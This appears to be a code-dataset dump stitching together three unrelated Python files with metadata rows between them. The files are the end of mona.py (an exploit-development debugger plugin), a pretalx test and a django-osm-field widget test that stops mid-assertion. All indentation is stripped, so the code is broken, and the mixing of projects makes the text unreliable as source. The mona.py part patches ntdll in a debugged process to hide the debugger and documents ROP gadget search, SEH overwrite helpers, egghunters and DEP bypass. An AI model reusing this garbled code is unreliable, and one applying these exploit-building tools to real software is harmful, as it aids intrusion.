zwq = dbg.getAddress("ntdll.ZwQuerySystemInformation")
if zwq > 0:
dbg.log("[+] Patching ZwQuerySystemInformation (0x%08x)" % zwq)
isPatched = False
a = 0
s = 0
while a < 3:
a += 1
s += dbg.disasmSizeOnly(zwq + s).opsize
FakeCode = dbg.readMemory(zwq, 1) + "\x78\x56\x34\x12" + dbg.readMemory(zwq + 5, 1)
if FakeCode == dbg.assemble("PUSH 0x12345678\nRET"):
isPatched = True
a = dbg.readLong(zwq+1)
i = 0
s = 0
while i < 3:
i += 1
s += dbg.disasmSizeOnly(a+s).opsize
if isPatched:
dbg.log(" Function was already patched.")
else:
a = dbg.remoteVirtualAlloc(size=0x1000)
if a > 0:
dbg.log(" Writing instructions to 0x%08x" % a)
dbg.writeMemory(a, dbg.readMemory(zwq,s))
pushCode = dbg.assemble("PUSH 0x%08x" % (zwq + s))
patchCode = "\x83\x7c\x24\x08\x07" # CMP [ESP+8],7
patchCode += "\x74\x06"
patchCode += pushCode
patchCode += "\xC3" # RETN
patchCode += "\x8B\x44\x24\x0c" # MOV EAX,[ESP+0x0c]
patchCode += "\x6a\x00" # PUSH 0
patchCode += "\x8f\x00" # POP [EAX]
patchCode += "\x33\xC0" # XOR EAX,EAX
patchCode += "\xC2\x14\x00" # RETN 14
dbg.writeMemory( a + s, patchCode)
# redirect function
dbg.writeMemory( zwq, dbg.assemble( "PUSH 0x%08X\nRET" % a) )
else:
dbg.log(" ** Unable to allocate memory in target process **")
else:
dbg.log("[-] Unable to patch ZwQuerySystemInformation")
return
# ----- Finally, some main stuff ----- #
# All available commands and their Usage :
sehUsage = """Default module criteria : non safeseh, non aslr, non rebase
This function will retrieve all stackpivot pointers that will bring you back to nseh in a seh overwrite exploit
Optional argument:
-all : also search outside of loaded modules"""
configUsage = """Change config of mona.py
Available options are : -get <parameter>, -set <parameter> <value> or -add <parameter> <value_to_add>
Valid parameters are : workingfolder, excluded_modules, author"""
jmpUsage = """Default module criteria : non aslr, non rebase
Mandatory argument : -r <reg> where reg is a valid register"""
ropfuncUsage = """Default module criteria : non aslr, non rebase, non os
Output will be written to ropfunc.txt"""
modulesUsage = """Shows information about the loaded modules"""
ropUsage="""Default module criteria : non aslr,non rebase,non os
Optional parameters :
-offset <value> : define the maximum offset for RET instructions (integer, default : 40)
-distance <value> : define the minimum distance for stackpivots (integer, default : 8).
If you want to specify a min and max distance, set the value to min,max
-depth <value> : define the maximum nr of instructions (not ending instruction) in each gadget (integer, default : 6)
-split : write gadgets to individual files, grouped by the module the gadget belongs to
-fast : skip the 'non-interesting' gadgets
-end <instruction(s)> : specify one or more instructions that will be used as chain end.
(Separate instructions with #). Default ending is RETN
-f \"file1,file2,..filen\" : use mona generated rop files as input instead of searching in memory
-rva : use RVA's in rop chain"""
jopUsage="""Default module criteria : non aslr,non rebase,non os
Optional parameters :
-depth <value> : define the maximum nr of instructions (not ending instruction) in each gadget (integer, default : 8)"""
stackpivotUsage="""Default module criteria : non aslr,non rebase,non os
Optional parameters :
-offset <value> : define the maximum offset for RET instructions (integer, default : 40)
-distance <value> : define the minimum distance for stackpivots (integer, default : 8)
If you want to specify a min and max distance, set the value to min,max
-depth <value> : define the maximum nr of instructions (not ending instruction) in each gadget (integer, default : 6)"""
filecompareUsage="""Compares 2 or more files created by mona using the same output commands
Make sure to use files that are created with the same version of mona and
contain the output of the same mona command.
Mandatory argument : -f \"file1,file2,...filen\"
Put all filenames between one set of double quotes, and separate files with comma's.
You can specify a foldername as well with -f, all files in the root of that folder will be part of the compare.
Output will be written to filecompare.txt and filecompare_not.txt (not matching pointers)
Optional parameters :
-contains \"INSTRUCTION\" (will only list if instruction is found)
-nostrict (will also list pointer is instructions don't match in all files)
-range <number> : find overlapping ranges for all pointers + range.
When using -range, the -contains and -nostrict options will be ignored
-ptronly : only show matching pointers (slightly faster). Doesn't work when 'range' is used"""
patcreateUsage="""Create a cyclic pattern of a given size. Output will be written to pattern.txt
in ascii, hex and unescape() javascript format
Mandatory argument : size (numberic value)
Optional arguments :
-extended : extend the 3rd characterset (numbers) with punctuation marks etc
-c1 <chars> : set the first charset to this string of characters
-c2 <chars> : set the second charset to this string of characters
-c3 <chars> : set the third charset to this string of characters"""
patoffsetUsage="""Find the location of 4 bytes in a cyclic pattern
Mandatory argument : the 4 bytes to look for
Note : you can also specify a register
Optional arguments :
-extended : extend the 3rd characterset (numbers) with punctuation marks etc
-c1 <chars> : set the first charset to this string of characters
-c2 <chars> : set the second charset to this string of characters
-c3 <chars> : set the third charset to this string of characters
Note : the charset must match the charset that was used to create the pattern !
"""
findwildUsage = """Find instructions in memory, accepts wildcards :
Mandatory arguments :
-s <instruction#instruction#instruction> (separate instructions with #)
Optional arguments :
-b <address> : base/bottom address of the search range
-t <address> : top address of the search range
-depth <nr> : number of instructions to go deep
-all : show all instruction chains, even if it contains something that might break the chain
-distance min=nr,max=nr : you can use a numeric offset wildcard (a single *) in the first instruction of the search
the distance parameter allows you to specify the range of the offset
Inside the instructions string, you can use the following wildcards :
* = any instruction
r32 = any register
Example : pop r32#*#xor eax,eax#*#pop esi#ret
"""
findUsage= """Find a sequence of bytes in memory.
Mandatory argument : -s <pattern> : the sequence to search for. If you specified type 'file', then use -s to specify the file.
This file needs to be a file created with mona.py, containing pointers at the begin of each line.
Optional arguments:
-type <type> : Type of pattern to search for : bin,asc,ptr,instr,file
-b <address> : base/bottom address of the search range
-t <address> : top address of the search range
-c : skip consecutive pointers but show length of the pattern instead
-p2p : show pointers to pointers to the pattern (might take a while !)
this setting equals setting -level to 1
-level <number> : do recursive (p2p) searches, specify number of levels deep
if you want to look for pointers to pointers, set level to 1
-offset <number> : subtract a value from a pointer at a certain level
-offsetlevel <number> : level to subtract a value from a pointer
-r <number> : if p2p is used, you can tell the find to also find close pointers by specifying -r with a value.
This value indicates the number of bytes to step backwards for each search
-unicode : used in conjunction with search type asc, this will convert the search pattern to unicode first
-ptronly : Only show the pointers, skip showing info about the pointer (slightly faster)"""
assembleUsage = """Convert instructions to opcode. Separate multiple instructions with #.
Mandatory argument : -s <instructions> : the sequence of instructions to assemble to opcode"""
infoUsage = """Show information about a given address in the context of the loaded application
Mandatory argument : -a <address> : the address to query"""
dumpUsage = """Dump the specified memory range to a file. Either the end address or the size of
buffer needs to be specified.
Mandatory arguments :
-s <address> : start address
-f <filename> : the name of the file where to write the bytes
Optional arguments:
-n <size> : the number of bytes to copy (size of the buffer)
-e <address> : the end address of the copy"""
compareUsage = """Compares contents of a binary file with locations in memory.
Mandatory argument :
-f <filename> : full path to binary file
Optional argument :
-a <address> : the exact address of the bytes in memory (address or register).
If you don't specify an address, I will try to locate the bytes in memory
by looking at the first 8 bytes.
-s : skip locations that belong to a module
-unicode : perform unicode search. Note: input should *not* be unicode, it will be expanded automatically"""
offsetUsage = """Calculate the number of bytes between two addresses. You can use
registers instead of addresses.
Mandatory arguments :
-a1 <address> : the first address/register
-a2 <address> : the second address/register"""
bpUsage = """Set a breakpoint when a given address is read from, written to or executed
Mandatory arguments :
-a <address> : the address where to set the breakpoint
(absolute address / register / modulename!functionname)
-t <type> : type of the breakpoint, can be READ, WRITE or SFX"""
bfUsage = """Set a breakpoint on exported or imported function(s) of the selected modules.
Mandatory argument :
-t <type> : type of breakpoint action. Can be 'add', 'del' or 'list'
Optional arguments :
-f <function type> : set to 'import' or 'export' to read IAT or EAT. Default : export
-s <func,func,func> : specify function names.
If you want a bp on all functions, set -s to *"""
nosafesehUsage = """Show modules that are not safeseh protected"""
nosafesehaslrUsage = """Show modules that are not safeseh protected, not subject to ASLR, and won't get rebased either"""
noaslrUsage = """Show modules that are not subject to ASLR and won't get rebased"""
findmspUsage = """Finds begin of a cyclic pattern in memory, looks if one of the registers contains (is overwritten) with a cyclic pattern
or points into a cyclic pattern. findmsp will also look if a SEH record is overwritten and finally,
it will look for cyclic patterns on the stack, and pointers to cyclic pattern on the stack.
Optional argument :
-distance <value> : distance from ESP, applies to search on the stack. Default : search entire stack
Note : you can use the same options as with pattern_create and pattern_offset in terms of defining the character set to use"""
suggestUsage = """Suggests an exploit buffer structure based on pointers to a cyclic pattern
Note : you can use the same options as with pattern_create and pattern_offset in terms of defining the character set to use
Mandatory argument in case you are using WinDBG or x64dbg:
-t <type:arg> : skeletontype. Valid types are :
tcpclient:port, udpclient:port, fileformat:extension
Examples : -t tcpclient:21
-t fileformat:pdf"""
bytearrayUsage = """Creates a byte array, can be used to find bad characters
Optional arguments :
-cpb <bytes> : bytes to exclude from the array. Example : '\\x00\\x0a\\x0d'
Note: you can specify wildcards using ..
Example: '\\x00\\x0a..\\x20\\x32\\x7f..\\xff'
-r : show array backwards (reversed), starting at \\xff
Output will be written to bytearray.txt, and binary output will be written to bytearray.bin"""
headerUsage = """Convert contents of a binary file to code that can be run to produce the file
Mandatory argument :
-f <filename> : source filename
Optional argument:
-t <type> : specify type of output. Valid choices are 'ruby' (default) or 'python' """
updateUsage = """Update mona to the latest version
Optional argument :
-http : Use http instead of https"""
getpcUsage = """Find getpc routine for specific register
Mandatory argument :
-r : register (ex: eax)"""
eggUsage = """Creates an egghunter routine
Optional arguments :
-t : tag (ex: w00t). Default value is w00t
-c : enable checksum routine. Only works in conjunction with parameter -f
-f <filename> : file containing the shellcode
-startreg <reg> : start searching at the address pointed by this reg
-wow64 : generate wow64 egghunter. Default is traditional 32bit egghunter
DEP Bypass options :
-depmethod <method> : method can be "virtualprotect", "copy" or "copy_size"
-depreg <reg> : sets the register that contains a pointer to the API function to bypass DEP.
By default this register is set to ESI
-depsize <value> : sets the size for the dep bypass routine
-depdest <reg> : this register points to the location of the egghunter itself.
When bypassing DEP, the egghunter is already marked as executable.
So when using the copy or copy_size methods, the DEP bypass in the egghunter
would do a "copy 2 self". In order to be able to do so, it needs a register
where it can copy the shellcode to.
If you leave this empty, the code will contain a GetPC routine."""
stacksUsage = """Shows all stacks for each thread in the running application"""
skeletonUsage = """Creates a Metasploit exploit module skeleton for a specific type of exploit
Mandatory argument in case you are using WinDBG:
-t <type:arg> : skeletontype. Valid types are :
tcpclient:port, udpclient:port, fileformat:extension
Examples : -t tcpclient:21
-t fileformat:pdf
Optional arguments :
-s : size of the cyclic pattern (default : 5000)
"""
heapUsage = """Show information about various heap chunk lists
Mandatory arguments :
-h <address> : base address of the heap to query
-t <type> : where type is 'segments', 'chunks', 'layout',
'fea' (let mona determine the frontend allocator),
'lal' (force display of LAL FEA, only on XP/2003),
'lfh' (force display of LFH FEA (Vista/Win7/...)),
'bea' (backend allocator, mona will automatically determine what it is),
'all' (show all information)
Note: 'layout' will show all heap chunks and their vtables & strings. Use on WinDBG for maximum results.
Optional arguments :
-expand : Works only in combination with 'layout', will include VA/LFH/... chunks in the search.
VA/LFH chunks may be very big, so this might slow down the search.
-stat : show statistics (also works in combination with -h heap, -t segments or -t chunks
-size <nr> : only show strings of at least the specified size. Works in combination with 'layout'
-after <data> : only show current & next chunk layout entries when an entry contains this data
(Only works in combination with 'layout')
-v : show data / write verbose info to the Log window"""
getiatUsage = """Show IAT entries from selected module(s)
Optional arguments :
-s <keywords> : only show IAT entries that contain one of these keywords"""
geteatUsage = """Show EAT entries from selected module(s)
Optional arguments :
-s <keywords> : only show EAT entries that contain one of these keywords"""
deferUsage = """Set a deferred breakpoint
Mandatory arguments :
-a <target>,<target>,...
target can be an address, a modulename.functionname or module.dll+offset (hex value)
Warning, modulename.functionname is case sensitive !
"""
calltraceUsage = """Logs all CALL instructions
Mandatory arguments :
-m module : specify what module to search for CALL instructions (global option)
Optional arguments :
-a <number> : number of arguments to show for each CALL
-r : also trace RETN instructions (will slow down process!)"""
fillchunkUsage = """Fills a heap chunk, referenced by a register, with A's (or another character)
Mandatory arguments :
-r <reg/reference> : reference to heap chunk to fill
Optional arguments :
-b <character or byte to use to fill up chunk>
-s <size> : if the referenced chunk is not found, and a size is defined with -s,
memory will be filled anyway, up to the specified size"""
getpageACLUsage = """List all mapped pages and show the ACL associated with each page
Optional arguments :
-a <address> : only show page information around this address.
(Page before, current page and page after will be displayed)"""
bpsehUsage = """Sets a breakpoint on all current SEH Handler function pointers"""
kbUsage = """Manage knowledgebase data
Mandatory arguments:
-<type> : type can be 'list', 'set' or 'del'
To 'set' ( = add / update ) a KB entry, or 'del' an entry,
you will need to specify 2 additional arguments:
-id <id> : the Knowledgebase ID
-value <value> : the value to add/update. In case of lists, use a comma to separate entries.
The -list parameter will show all current ID's
To see the contents of a specific ID, use the -id <id> parameter."""
macroUsage = """Manage macros for WinDBG
Arguments:
-run <macroname> : run the commands defined in the specified macro
-show <macroname> : show all commands defined in the specified macro
-add <macroname> : create a new macro
-set <macroname> -index <nr> -cmd <windbg command(s)> : edit a macro
If you set the -command value to #, the command at the specified index
will be removed. If you have specified an existing index, the command
at that position will be replaced, unless you've also specified the -insert parameter.
If you have not specified an index, the command will be appended to he list.
-set <macroname> -file <filename> : will tell this macro to execute all instructions in the
specified file. You can only enter one file per macro.
-del <macroname> -iamsure: remove the specified macro. Use with care, I won't ask if you're sure."""
sehchainUsage = """Displays the SEH chain for the current thread.
This command will also attempt to display offsets and suggest a payload structure
in case a cyclic pattern was used to overwrite the chain."""
heapCookieUsage = """Will attempt to find reliable writeable pointers that can help avoiding
a heap cookie check during an arbitrary free on Windows XP"""
hidedebugUsage = """Will attempt to hide the debugger from the process"""
gflagsUsage = """Will show the currently set GFlags, based on the PEB.NtGlobalFlag value"""
fwptrUsage = """Search for calls to pointers in a writeable location,
will assist with finding a good target for 4byte arbitrary writes
Optional arguments:
-bp : Set breakpoints on all found CALL instructions
-patch : Patch the target of each CALL with 0x41414141
-chunksize <nr> : only list the pointer if location-8 bytes contains a size value larger than <nr>
(size in blocks, not bytes)
-offset <nr> : add <nr> bytes of offset within chunk, after flink/blink pointer
(use in combination with -freelist and -chunksize <nr>)
-freelist : Search for fwptr that are preceeded by 2 readable pointers that can act as flink/blink"""
allocmemUsage = """Allocate RWX memory in the debugged process.
Optional arguments:
-s <size> : desired size of allocated chunk. VirtualAlloc will allocate at least 0x1000 bytes,
but this size argument is only useful when used in combination with -fill.
-a <address> : desired target location for allocation, set to start of chunk to allocate.
-acl <level> : overrule default RWX memory protection.
-fill : fill 'size' bytes (-s) of memory at specified address (-a) with A's.
-force : use in combination with -fill, in case page was already mapped but you still want to
fill the chunk at the desired location.
-b <byte> : Specify what byte to write to the desired location. Defaults to '\\x41'
"""
changeaclUsage = """Change the ACL of a given page.
Arguments:
-a <address> : Address belonging to the page that needs to be changed
-acl <level> : New ACL. Valid values are R,RW,RXW,RX,N,GUARD,NOCACHE,WC"""
infodumpUsage = """Dumps contents of memory to file. Contents will include all pages that don't
belong to stack, heap or loaded modules.
Output will be written to infodump.xml"""
pebUsage = """Show the address of the Process Environment Block (PEB)"""
tebUsage = """Show the address of the Thread Environment Block (TEB) for the current thread"""
encUsage = """Encode a series of bytes
Arguments:
-t <type> : Type of encoder to use. Allowed value(s) are alphanum
-s <bytes> : The bytes to encode (or use -f instead)
-f <path to file> : The full path to the binary file that contains the bytes to encode"""
stringUsage = """Read a string from memory or write a string to memory
Arguments:
-r : Read a string, use in combination with -a
-w : Write a string, use in combination with -a and -s
-noterminate : Do not terminate the string (using in combination with -w)
-u : use UTF-16 (Unicode) mode
-s <string> : The string to write
-a <address> : The location to read from or write to"""
unicodealignUsage = """Generates a venetian shellcode alignment stub which can be placed directly before unicode shellcode.
Arguments:
-a <address> : Specify the address where the alignment code will start/be placed
: If -a is not specified, the current value in EIP will be used.
-l : Prepend alignment with a null byte compensating nop equivalent
(Use this if the last instruction before the alignment routine 'leaks' a null byte)
-b <reg> : Set the bufferregister, defaults to eax
-t <seconds> : Time in seconds to run heuristics (defaults to 15)
-ebp <value> : Overrule the use of the 'current' value of ebp,
ebp/address will be used to calculate offset to shellcode"""
copyUsage = """Copies bytes from one location to another.
Arguments:
-src <address> : The source address
-dst <address> : The destination address
-n <number> : The number of bytes to copy"""
dumpobjUsage = """Dump the contents of an object.
Arguments:
-a <address> : Address of object
-s <number> : Size of object (default value: 0x28 or size of chunk)
Optional arguments:
-l <number> : Recursively dump objects
-m <number> : Size for recursive objects (default value: 0x28)
"""
dumplogUsage = """Dump all objects recorded in an alloc/free log
Note: dumplog will only dump objects that have not been freed in the same logfile.
Expected syntax for log entries:
Alloc : 'alloc(size in hex) = address'
Free : 'free(address)'
Additional text after the alloc & free info is fine.
Just make sure the syntax matches exactly with the examples above.
Arguments:
-f <path/to/logfile> : Full path to the logfile
Optional arguments:
-l <number> : Recursively dump objects
-m <number> : Size for recursive objects (default value: 0x28)"""
tobpUsage = """Generate WinDBG syntax to set a logging breakpoint at a given location
Arguments:
-a <address> : Location (address, register) for logging breakpoint
Optional arguments:
-e : Execute breakpoint command right away"""
flowUsage = """Simulates execution flows from current location (EIP), tries all conditional jump combinations
Optional arguments:
-e <address> : Show execution flows that will reach specified address
-avoid <address,address,...> : Only show paths that don't contain any of the pointers to avoid
-n <nr> : Max nr of instructions, default: 60
-cl <nr> : Max level of CALL to follow in detail, default: 3
-cs <nr> : Don't show details of first <nr> CALL/child functions. default: 0
-func : Show function names (slows down process)."""
evalUsage = """Evaluates an expression
Arguments:
<the expression to evaluate>
Accepted syntax includes:
hex values, decimal values (prefixed with 0n), registers,
module names, 'heap' ( = address of default process heap),
module!functionname
simple math operations"""
diffheapUsage = """Compare current heap layout with previously saved state
Arguments:
-save : save current state to disk
-diff : compare current state with previously saved state"""
commands["seh"] = MnCommand("seh", "Find pointers to assist with SEH overwrite exploits",sehUsage, procFindSEH)
commands["config"] = MnCommand("config","Manage configuration file (mona.ini)",configUsage,procConfig,"conf")
commands["jmp"] = MnCommand("jmp","Find pointers that will allow you to jump to a register",jmpUsage,procFindJMP, "j")
commands["ropfunc"] = MnCommand("ropfunc","Find pointers to pointers (IAT) to interesting functions that can be used in your ROP chain",ropfuncUsage,procFindROPFUNC)
commands["rop"] = MnCommand("rop","Finds gadgets that can be used in a ROP exploit and do ROP magic with them",ropUsage,procROP)
commands["jop"] = MnCommand("jop","Finds gadgets that can be used in a JOP exploit",jopUsage,procJOP)
commands["stackpivot"] = MnCommand("stackpivot","Finds stackpivots (move stackpointer to controlled area)",stackpivotUsage,procStackPivots)
commands["modules"] = MnCommand("modules","Show all loaded modules and their properties",modulesUsage,procShowMODULES,"mod")
commands["filecompare"] = MnCommand("filecompare","Compares 2 or more files created by mona using the same output commands",filecompareUsage,procFileCOMPARE,"fc")
commands["pattern_create"] = MnCommand("pattern_create","Create a cyclic pattern of a given size",patcreateUsage,procCreatePATTERN,"pc")
commands["pattern_offset"] = MnCommand("pattern_offset","Find location of 4 bytes in a cyclic pattern",patoffsetUsage,procOffsetPATTERN,"po")
commands["find"] = MnCommand("find", "Find bytes in memory", findUsage, procFind,"f")
commands["findwild"] = MnCommand("findwild", "Find instructions in memory, accepts wildcards", findwildUsage, procFindWild,"fw")
commands["assemble"] = MnCommand("assemble", "Convert instructions to opcode. Separate multiple instructions with #",assembleUsage,procAssemble,"asm")
commands["info"] = MnCommand("info", "Show information about a given address in the context of the loaded application",infoUsage,procInfo)
commands["dump"] = MnCommand("dump", "Dump the specified range of memory to a file", dumpUsage,procDump)
commands["offset"] = MnCommand("offset", "Calculate the number of bytes between two addresses", offsetUsage, procOffset)
commands["compare"] = MnCommand("compare","Compare contents of a binary file with a copy in memory", compareUsage, procCompare,"cmp")
commands["breakpoint"] = MnCommand("bp","Set a memory breakpoint on read/write or execute of a given address", bpUsage, procBp,"bp")
commands["nosafeseh"] = MnCommand("nosafeseh", "Show modules that are not safeseh protected", nosafesehUsage, procModInfoS)
commands["nosafesehaslr"] = MnCommand("nosafesehaslr", "Show modules that are not safeseh protected, not aslr and not rebased", nosafesehaslrUsage, procModInfoSA)
commands["noaslr"] = MnCommand("noaslr", "Show modules that are not aslr or rebased", noaslrUsage, procModInfoA)
commands["findmsp"] = MnCommand("findmsp","Find cyclic pattern in memory", findmspUsage,procFindMSP,"findmsf")
commands["suggest"] = MnCommand("suggest","Suggest an exploit buffer structure", suggestUsage,procSuggest)
commands["bytearray"] = MnCommand("bytearray","Creates a byte array, can be used to find bad characters",bytearrayUsage,procByteArray,"ba")
commands["header"] = MnCommand("header","Read a binary file and convert content to a nice 'header' string",headerUsage,procPrintHeader)
commands["update"] = MnCommand("update","Update mona to the latest version",updateUsage,procUpdate,"up")
commands["getpc"] = MnCommand("getpc","Show getpc routines for specific registers",getpcUsage,procgetPC)
commands["egghunter"] = MnCommand("egghunter","Create egghunter code",eggUsage,procEgg,"egg")
commands["stacks"] = MnCommand("stacks","Show all stacks for all threads in the running application",stacksUsage,procStacks)
commands["skeleton"] = MnCommand("skeleton","Create a Metasploit module skeleton with a cyclic pattern for a given type of exploit",skeletonUsage,procSkeleton)
commands["breakfunc"] = MnCommand("breakfunc","Set a breakpoint on an exported function in on or more dll's",bfUsage,procBf,"bf")
commands["heap"] = MnCommand("heap","Show heap related information",heapUsage,procHeap)
commands["getiat"] = MnCommand("getiat","Show IAT of selected module(s)",getiatUsage,procGetIAT,"iat")
commands["geteat"] = MnCommand("geteat","Show EAT of selected module(s)",geteatUsage,procGetEAT,"eat")
commands["pageacl"] = MnCommand("pageacl","Show ACL associated with mapped pages",getpageACLUsage,procPageACL,"pacl")
commands["bpseh"] = MnCommand("bpseh","Set a breakpoint on all current SEH Handler function pointers",bpsehUsage,procBPSeh,"sehbp")
commands["kb"] = MnCommand("kb","Manage Knowledgebase data",kbUsage,procKb,"kb")
commands["encode"] = MnCommand("encode","Encode a series of bytes",encUsage,procEnc,"enc")
commands["unicodealign"] = MnCommand("unicodealign","Generate venetian alignment code for unicode stack buffer overflow",unicodealignUsage,procUnicodeAlign,"ua")
#commands["heapcookie"] = MnCommand("heapcookie","Looks for writeable pointers that can help avoiding cookie check during arbitrary free",heapCookieUsage,procHeapCookie,"hc")
if __DEBUGGERAPP__ == "Immunity Debugger" or __DEBUGGERAPP__ == 'x64dbg':
commands["deferbp"] = MnCommand("deferbp","Set a deferred breakpoint",deferUsage,procBu,"bu")
commands["calltrace"] = MnCommand("calltrace","Log all CALL instructions",calltraceUsage,procCallTrace,"ct")
if __DEBUGGERAPP__ == "WinDBG":
commands["fillchunk"] = MnCommand("fillchunk","Fill a heap chunk referenced by a register",fillchunkUsage,procFillChunk,"fchunk")
commands["dumpobj"] = MnCommand("dumpobj","Dump the contents of an object",dumpobjUsage,procDumpObj,"do")
commands["dumplog"] = MnCommand("dumplog","Dump objects present in alloc/free log file",dumplogUsage,procDumpLog,"dl")
commands["changeacl"] = MnCommand("changeacl","Change the ACL of a given page",changeaclUsage,procChangeACL,"ca")
commands["allocmem"] = MnCommand("allocmem","Allocate some memory in the process",allocmemUsage,procAllocMem,"alloc")
commands["tobp"] = MnCommand("tobp","Generate WinDBG syntax to create a logging breakpoint at given location",tobpUsage,procToBp,"2bp")
commands["flow"] = MnCommand("flow","Simulate execution flows, including all branch combinations",flowUsage,procFlow,"flw")
#commands["diffheap"] = MnCommand("diffheap", "Compare current heap layout with previously saved state", diffheapUsage, procDiffHeap, "dh")
commands["fwptr"] = MnCommand("fwptr", "Find Writeable Pointers that get called", fwptrUsage, procFwptr, "fwp")
commands["sehchain"] = MnCommand("sehchain","Show the current SEH chain",sehchainUsage,procSehChain,"exchain")
commands["hidedebug"] = MnCommand("hidedebug","Attempt to hide the debugger",hidedebugUsage,procHideDebug,"hd")
commands["gflags"] = MnCommand("gflags", "Show current GFlags settings from PEB.NtGlobalFlag", gflagsUsage, procFlags, "gf")
commands["infodump"] = MnCommand("infodump","Dumps specific parts of memory to file", infodumpUsage, procInfoDump,"if")
commands["peb"] = MnCommand("peb","Show location of the PEB",pebUsage,procPEB,"peb")
commands["teb"] = MnCommand("teb","Show TEB related information",tebUsage,procTEB,"teb")
commands["string"] = MnCommand("string","Read or write a string from/to memory",stringUsage,procString,"str")
commands["copy"] = MnCommand("copy","Copy bytes from one location to another",copyUsage,procCopy,"cp")
commands["?"] = MnCommand("?","Evaluate an expression",evalUsage,procEval,"eval")
# get the options
opts = {}
last = ""
arguments = []
argcopy = copy.copy(args)
aline = " ".join(a for a in argcopy)
if __DEBUGGERAPP__ == "WinDBG":
aline = "!py " + aline
else:
aline = "!mona " + aline
dbg.log("[+] Command used:")
dbg.log("%s" % aline)
# in case we're not using Immunity
if "-showargs" in args:
dbg.log("-" * 50)
dbg.log("args: %s" % args)
if len(args) > 0:
if args[0].lower().startswith("mona") or args[0].lower().endswith("mona") or args[0].lower().endswith("mona.py"):
args.pop(0)
if len(args) >= 2:
arguments = args[1:]
if "-showargs" in args:
dbg.log("arguments: %s" % arguments)
for word in arguments:
if (word[0] == '-'):
word = word.lstrip("-")
opts[word] = True
last = word
else:
if (last != ""):
if str(opts[last]) == "True":
opts[last] = word
else:
opts[last] = opts[last] + " " + word
#last = ""
# if a command only requires a value and not a switch ?
# then we'll drop the value into dictionary with key "?"
if len(args) > 1 and args[1][0] != "-":
opts["?"] = args[1]
if len(args) < 1:
commands["help"].parseProc(opts)
return("")
command = args[0]
if "-showargs" in args:
dbg.log("command: %s" % command)
dbg.log("-" * 50)
args.remove("-showargs")
arguments.remove("-showargs")
# ----- execute the chosen command ----- #
if command in commands:
if command.lower().strip() == "help":
commands[command].parseProc(args)
else:
commands[command].parseProc(opts)
else:
# maybe it's an alias
aliasfound = False
for cmd in commands:
if commands[cmd].alias == command:
commands[cmd].parseProc(opts)
aliasfound = True
if not aliasfound:
commands["help"].parseProc(None)
return("** Invalid command **")
# ----- report ----- #
endtime = datetime.datetime.now()
delta = endtime - starttime
dbg.log("")
dbg.log("[+] This mona.py action took %s" % str(delta))
dbg.setStatusBar("Done")
except:
dbg.log("*" * 80,highlight=True)
dbg.logLines(traceback.format_exc(),highlight=True)
dbg.log("*" * 80,highlight=True)
dbg.error(traceback.format_exc())
return ""
def mona(args_str):
main(args_str.split())
if __name__ == "__main__":
dbg.log("Hold on...")
# do we need to profile ?
doprofile = False
if "-profile" in sys.argv:
doprofile = True
dbg.log("Starting profiler...")
cProfile.run('main(sys.argv)', 'monaprofile')
else:
main(sys.argv)
if doprofile:
dbg.log("[+] Showing profile stats...")
p = pstats.Stats('monaprofile')
dbg.log(" ***** ALL *****")
p.print_stats()
dbg.log(" ***** CUMULATIVE *****")
p.sort_stats('cumulative').print_stats(30)
dbg.log(" ***** TIME *****")
p.sort_stats('time', 'cum').print_stats(30)
# clear memory
if __DEBUGGERAPP__ == "WinDBG" or __DEBUGGERAPP__ == "x64dbg":
dbglib.clearvars()
try:
# allvars = [var for var in globals() if var[0] != "_"]
# for var in allvars:
# del globals()[var]
resetGlobals()
dbg = None
except:
pass
| 45.156384 | 368 | 0.46592 | [
"BSD-3-Clause"
] | Shtrikh17/mona | monaFile.py | 833,632 | Python |
import pytest
from pretalx.event.models import Organiser
from pretalx.event.utils import create_organiser_with_team
@pytest.mark.django_db
def test_user_organiser_init(user):
assert Organiser.objects.count() == 0
assert user.teams.count() == 0
create_organiser_with_team(name='Name', slug='slug', users=[user])
assert Organiser.objects.count() == 1
assert user.teams.count() == 1
assert user.teams.get().organiser == Organiser.objects.get()
| 31.2 | 70 | 0.741453 | [
"Apache-2.0"
] | orlando/pretalx | src/tests/event/test_event_utils.py | 468 | Python |
# -*- coding: utf-8 -*-
import sys
from django.test import SimpleTestCase
from django.test.utils import override_settings
from .forms import (CustomNamingForm, DefaultNamingForm, MixedNamingForm,
MultipleNamingForm)
class TestWidget(SimpleTestCase):
def test_custom_naming(self):
html = CustomNamingForm().as_p()
self.assertIn('name="location"', html)
self.assertIn('data-lat-field="latitude"', html)
self.assertIn('data-lon-field="longitude"', html)
self.assertIn('name="latitude"', html)
self.assertIn('name="longitude"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_location").osmfield();});'
'</script>',
html
)
def test_default_naming(self):
html = DefaultNamingForm().as_p()
self.assertIn('name="location"', html)
self.assertIn('data-lat-field="location_lat"', html)
self.assertIn('data-lon-field="location_lon"', html)
self.assertIn('name="location_lat"', html)
self.assertIn('name="location_lon"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_location").osmfield();});'
'</script>',
html
)
def test_mixed_naming(self):
html = MixedNamingForm().as_p()
self.assertIn('name="location"', html)
self.assertIn('data-lat-field="location_lat"', html)
self.assertIn('data-lon-field="longitude"', html)
self.assertIn('name="location_lat"', html)
self.assertIn('name="longitude"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_location").osmfield();});'
'</script>',
html
)
def test_multiple_naming(self):
html = MultipleNamingForm().as_p()
self.assertIn('name="default_location"', html)
self.assertIn('data-lat-field="default_location_lat"', html)
self.assertIn('data-lon-field="default_location_lon"', html)
self.assertIn('name="default_location_lat"', html)
self.assertIn('name="default_location_lon"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_default_location").osmfield();});'
'</script>',
html
)
self.assertIn('name="custom_location"', html)
self.assertIn('data-lat-field="custom_latitude"', html)
self.assertIn('data-lon-field="custom_longitude"', html)
self.assertIn('name="custom_latitude"', html)
self.assertIn('name="custom_longitude"', html)
self.assertIn(
'<script type="application/javascript">'
'$(function(){$("#id_custom_location").osmfield();});'
'</script>',
html
)
class TestMedia(SimpleTestCase):
@override_settings(DEBUG=True)
def test_css_debug(self):
css = DefaultNamingForm().media.render_css()
self.assertEqual(
'<link href="css/vendor/leaflet.css" type="text/css" media="screen" rel="stylesheet" />'
'<link href="css/osm_field.css" type="text/css" media="screen" rel="stylesheet" />',
''.join(css)
)
def test_css_no_debug(self):
css = DefaultNamingForm().media.render_css()
self.assertEqual(
'<link href="css/vendor/leaflet.css" type="text/css" media="screen" rel="stylesheet" />'
